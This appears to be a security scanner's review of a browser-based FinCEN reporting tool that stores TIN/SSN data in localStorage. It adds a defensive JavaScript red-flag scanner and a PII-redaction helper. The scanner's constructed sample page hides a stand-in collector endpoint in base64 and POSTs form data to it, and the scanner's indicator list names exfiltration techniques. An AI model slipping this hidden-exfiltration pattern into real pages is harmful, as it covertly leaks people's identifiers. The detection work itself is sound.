Skill v1.0.0

ClawScan security

Compliance Guardian · ClawHub's context-aware review of the artifact, metadata, and declared behavior.

Scanner verdict

Suspicious · Apr 4, 2026, 5:52 PM
Verdict
suspicious
Confidence
medium
Model
gpt-5-mini
Summary
The skill's functionality (a browser HTML tool to screen FinCEN reporting and store filing data) is coherent with its description, but it collects sensitive PII/TIN data in the browser and the provided HTML was truncated in the review, leaving possible hidden network behavior unverified—exercise caution and inspect the full file before use.
Guidance
This tool appears to be a straightforward browser-based FinCEN reporting helper, and it does not request external credentials or installation. However:
- The form collects very sensitive PII (names, DOBs, addresses, TIN/SSNs). Only enter such data if you trust where the file is served from and you understand how it will be stored and who can access it. localStorage is unencrypted and persists on the browser profile.
- Before using or deploying, open the full compliance-guardian.html in a text editor and search for any network activity or obfuscated code: look for fetch(), XMLHttpRequest, navigator.sendBeacon, WebSocket, <script src=>, <img src=>, eval(), atob()/btoa(), long base64 strings, or remote URLs. If any are present, confirm their purpose and destination.
- If you plan to host it with your Mission Control instance, serve it from a trusted, HTTPS origin and confirm the origin does not add third-party scripts that could read localStorage.
- Consider avoiding entry of SSNs/TINs into this tool if you cannot guarantee local-only storage. If you must store highly sensitive fields, use a version enhanced for secure storage (encrypted storage, server-side vaulting) or remove those fields from local persistence.
- Because the provided HTML in the review was truncated, I have medium confidence in this assessment. If you provide the complete compliance-guardian.html (full source), I can re-scan it for hidden network requests, obfuscation, or other red flags and raise the confidence of this verdict.

Review Dimensions

Purpose & Capability
ok · Name/description match the delivered assets: an instruction-only skill with a single HTML file that implements a screener, form pre-filler, and deadline tracker for FinCEN residential real estate reporting. Nothing requested (no env vars, no binaries, no install) is out of scope for that purpose.
Instruction Scope
note · SKILL.md instructs the user to download/open the single HTML file and optionally add a Mission Control navigation button; the HTML (what was visible) implements UI and saves data to browser localStorage only. This scope is appropriate for a browser-based helper, but the skill collects highly sensitive fields (names, DOB, addresses, TIN/SSN). The instructions do not describe any external transmission, but the HTML file in the prompt was truncated — the remainder may include network calls or telemetry. Verify the full file for any fetch/XHR, <img>, <script src=>, navigator.sendBeacon, eval/obfuscated code, or base64-encoded payloads before use.
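The red-flag search that the Guidance and the Instruction Scope entry describe, as an added worked example (not ClawScan's scanner and not code from the skill): a Node script that applies that indicator list to an HTML file, reports each hit with its line number, and decodes long base64 runs so that an endpoint hidden behind atob() becomes visible. The `new Function()` pattern is added alongside eval(); the sample HTML, its tracker/collector hostnames and the script name are constructed for the demonstration.

```javascript
// Added example (not ClawScan's scanner, not code from the skill): static
// red-flag pass over a single-file HTML tool such as compliance-guardian.html.
// Usage: node scan.js compliance-guardian.html   (no argument: scans SAMPLE_HTML)

// Patterns a local-only helper page should not need. Every match is reported
// with its line so the reviewer can read it in context and judge it.
const INDICATORS = [
  { name: 'fetch()',              re: /\bfetch\s*\(/g },
  { name: 'XMLHttpRequest',       re: /\bXMLHttpRequest\b/g },
  { name: 'navigator.sendBeacon', re: /navigator\.sendBeacon/g },
  { name: 'WebSocket',            re: /\bWebSocket\b/g },
  { name: '<script src=>',        re: /<script\b[^>]*\bsrc\s*=/gi },
  { name: '<img src=>',           re: /<img\b[^>]*\bsrc\s*=/gi },
  { name: 'eval()',               re: /\beval\s*\(/g },
  { name: 'new Function()',       re: /\bnew\s+Function\s*\(/g },  // added: eval's sibling
  { name: 'atob()/btoa()',        re: /\b(?:atob|btoa)\s*\(/g },
  { name: 'remote URL',           re: /https?:\/\/[^\s"'<>)]+/g },
];

// A run of 40+ base64 characters is worth decoding: obfuscated code and
// hidden endpoints are usually stored this way.
const LONG_BASE64 = /[A-Za-z0-9+\/]{40,}={0,2}/g;

// 1-based line number of a character offset in `text`.
function lineOf(text, index) {
  let line = 1;
  for (let i = 0; i < index; i++) if (text.charCodeAt(i) === 10) line++;
  return line;
}

// Decode a base64 run and return a short preview when it is mostly printable
// text (a URL, JavaScript, JSON). Binary blobs such as inline images decode
// to non-printable bytes and are returned as null to keep the report short.
function decodeBase64Preview(s) {
  const decoded = Buffer.from(s, 'base64').toString('utf8');
  if (decoded.length === 0) return null;
  const printable = decoded.replace(/[^\x20-\x7e\n\r\t]/g, '').length / decoded.length;
  return printable > 0.9 ? decoded.slice(0, 80) : null;
}

// Scan one HTML document; returns findings sorted by line.
function scanHtml(html) {
  const findings = [];
  for (const { name, re } of INDICATORS) {
    re.lastIndex = 0;
    let m;
    while ((m = re.exec(html)) !== null) {
      findings.push({ indicator: name, line: lineOf(html, m.index), snippet: m[0].slice(0, 80) });
    }
  }
  LONG_BASE64.lastIndex = 0;
  let m;
  while ((m = LONG_BASE64.exec(html)) !== null) {
    findings.push({
      indicator: 'long base64 string',
      line: lineOf(html, m.index),
      snippet: m[0].slice(0, 40) + '...',
      decoded: decodeBase64Preview(m[0]),
    });
  }
  return findings.sort((a, b) => a.line - b.line);
}

// True when anything found could move data off the machine, including a URL
// that only appears after base64 decoding.
function hasNetworkRedFlags(findings) {
  const network = new Set(['fetch()', 'XMLHttpRequest', 'navigator.sendBeacon',
    'WebSocket', '<script src=>', '<img src=>', 'remote URL']);
  return findings.some(f => network.has(f.indicator) || (f.decoded && /https?:\/\//.test(f.decoded)));
}

// Constructed sample: a page that looks local-only but phones home. Not the
// real compliance-guardian.html; the hostnames are made up.
const SAMPLE_HTML = `<!doctype html>
<html><head><title>Constructed sample, not the real skill file</title></head>
<body>
<form id="filing"><label>TIN <input name="tin"></label></form>
<img src="https://tracker.example.org/p.gif" width="1" height="1">
<script>
  // Looks local-only: the form data goes to localStorage ...
  const record = { tin: document.querySelector('[name=tin]').value };
  localStorage.setItem('filing', JSON.stringify(record));
  // ... but the destination below is hidden behind a base64 string.
  const endpoint = atob('aHR0cHM6Ly9jb2xsZWN0b3IuZXhhbXBsZS5uZXQvdXBsb2Fk');
  fetch(endpoint, { method: 'POST', body: localStorage.getItem('filing') });
</script>
</body></html>`;

function main() {
  let html = SAMPLE_HTML;
  if (process.argv[2]) html = require('fs').readFileSync(process.argv[2], 'utf8');
  const findings = scanHtml(html);
  for (const f of findings) {
    const extra = f.decoded ? `  (decodes to: ${f.decoded})` : '';
    console.log(`line ${f.line}: ${f.indicator}  ${f.snippet}${extra}`);
  }
  console.log(hasNetworkRedFlags(findings) ? 'RED FLAGS: possible network activity' : 'no network indicators found');
}

if (typeof require !== 'undefined' && require.main === module) main();
```

A hit is not a verdict: a relative `<script src=>` or a `data:` image may be legitimate, and a minified identifier can trip the base64 pattern. The point of the decode step is the case in the sample, where no `http` string appears in the file at all and the endpoint surfaces only after atob(); grep alone misses that.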
Install Mechanism
ok · No install spec and no binaries requested; runtime is purely a local HTML file opened in a browser. This is minimal and proportionate.
Credentials
ok · The skill declares no required environment variables or external credentials. That aligns with the stated purpose. However, the tool requests collection of personal identifying information (including TIN/SSN) through its UI; while expected for the task, this raises data-sensitivity concerns rather than mismatched credential requests.
Persistence & Privilege
note · The tool persists entries in browser localStorage (per SKILL.md and visible HTML). This is expected for a client-side tracker, but localStorage is unencrypted and accessible to other scripts served from the same origin. Adding the file to Mission Control or serving it from a shared host could expose stored PII to the host origin. The skill is not marked always:true and does not require elevated agent privileges.
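One way to act on the localStorage exposure described in this entry, as an added example that is not code from the skill: persist only a redacted copy of the filing record, so the same-origin readers the entry warns about never see a full TIN, SSN or date of birth. The field names, the `MemoryStorage` stand-in for `window.localStorage`, and the sample record are assumptions made for the demonstration.

```javascript
// Added example (not code from the skill): keep TIN/SSN/DOB out of what is
// written to localStorage. Anything persisted there is readable, verbatim, by
// every script the same origin serves, so the safe default is to not write it.
// Field names are assumptions about a FinCEN-style filing record; MemoryStorage
// stands in for window.localStorage so this runs under Node.

// Dropped entirely before persisting.
const DROP_KEYS = new Set(['dob', 'dateOfBirth', 'passportNumber']);
// Identifier-like keys keep only their last four characters under a
// "<key>Last4" name, enough to tell saved drafts apart in the UI.
const MASK_KEYS = new Set(['tin', 'ssn', 'ein', 'itin']);

// Deep copy of `value` with sensitive keys removed or masked at every level
// (objects nested in arrays, e.g. a list of beneficial owners, included).
function redactForPersistence(value) {
  if (Array.isArray(value)) return value.map(redactForPersistence);
  if (value === null || typeof value !== 'object') return value;
  const out = {};
  for (const [key, v] of Object.entries(value)) {
    if (DROP_KEYS.has(key)) continue;
    if (MASK_KEYS.has(key)) {
      if (typeof v === 'string' && v.length >= 4) out[`${key}Last4`] = v.slice(-4);
      continue;
    }
    out[key] = redactForPersistence(v);
  }
  return out;
}

// Minimal stand-in for window.localStorage (same getItem/setItem/key contract).
class MemoryStorage {
  constructor() { this.map = new Map(); }
  getItem(k) { return this.map.has(k) ? this.map.get(k) : null; }
  setItem(k, v) { this.map.set(k, String(v)); }
  removeItem(k) { this.map.delete(k); }
  get length() { return this.map.size; }
  key(i) { return [...this.map.keys()][i] ?? null; }
}

// Save the redacted record; the full record stays in memory for the session.
function saveFiling(storage, key, record) {
  const persisted = redactForPersistence(record);
  storage.setItem(key, JSON.stringify(persisted));
  return persisted;
}

function loadFiling(storage, key) {
  const raw = storage.getItem(key);
  return raw === null ? null : JSON.parse(raw);
}

// What any other script on the same origin (an injected analytics tag, a
// compromised host page) gets back: the whole store, as stored.
function dumpStorage(storage) {
  const out = {};
  for (let i = 0; i < storage.length; i++) {
    const k = storage.key(i);
    out[k] = storage.getItem(k);
  }
  return out;
}

// Constructed sample record; every value is made up.
const SAMPLE_RECORD = {
  property: { address: '1 Example St, Springfield' },
  transferee: { name: 'Example Holdings LLC', ein: '98-7654321' },
  beneficialOwners: [
    { name: 'A. Person', dob: '1980-01-01', tin: '123-45-6789', address: '2 Example Ave' },
  ],
  deadline: '2026-04-30',
};

const store = new MemoryStorage();
saveFiling(store, 'cg:filing', SAMPLE_RECORD);
console.log('persisted:', dumpStorage(store)['cg:filing']);
```

This trades convenience for blast radius: the user re-enters the identifier when the filing is actually prepared, and a script that reads the origin's localStorage gets a last-four fragment at most. If full values must survive a reload, the Guidance's other options apply (client-side encryption under a key the page never stores, or server-side vaulting), and the redaction above still limits what a co-hosted script can read.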